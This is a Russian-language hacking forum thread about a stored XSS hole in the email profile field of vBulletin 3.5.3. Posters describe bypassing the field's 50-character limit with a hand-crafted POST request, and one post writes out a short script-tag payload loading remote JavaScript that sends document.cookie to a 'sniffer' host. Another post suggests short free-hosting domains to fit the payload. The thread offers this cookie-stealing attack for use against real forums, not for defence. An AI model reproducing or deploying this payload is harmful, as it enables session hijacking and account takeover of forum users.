vBulletin 3.5.3. Вопрос по XSS в поле email

Discussion in 'Песочница' started by r0, 8 Sep 2006.

  1. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    В этой версии форума в поле mail в профиле, можно провести xss

    Вот, но поле для ввода ограничено 50ти символами, эм.. возникает вопрос: как быть тогда? +)
     
  2. D=P=CH= MOD=

    D=P=CH= MOD= Elder - Старейшина

    Joined:
    15 Aug 2006
    Messages:
    249
    Likes Received:
    195
    Reputations:
    15
    Наверное тогда никак - скрипт если тока уменьшить, но кажись это не реал...
    Для того и есть эти ограничения)
     
  3. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    В том то и дело) как тестилось-то? на локалхосте? :) зачем тогда xss? просто, чтобы признать ее существование?
     
  4. wsr

    wsr New Member

    Joined:
    20 Apr 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Все гораздо проще, формируете ПОСТ запрос и туда подставляете все что нужно вместо поля e-mail. Все ограничения сразу же отпадают. У меня все работает без проблем.
     
  5. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    [email protected]”<script>src=http://aa.bab.ru/x.js?<b> Хехе 49 символов. Если удасться такой короткий url найти для сайта.))) А в x.js img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;

    Может сработает, а может и нет. ))
     
    1 person likes this.
  6. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    спасибо за идею)
     
  7. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    под такой пример подойдет фришный хост на холме у них там h10.ru и h7.ru вместо лонига 2-3 символа
     
Loading...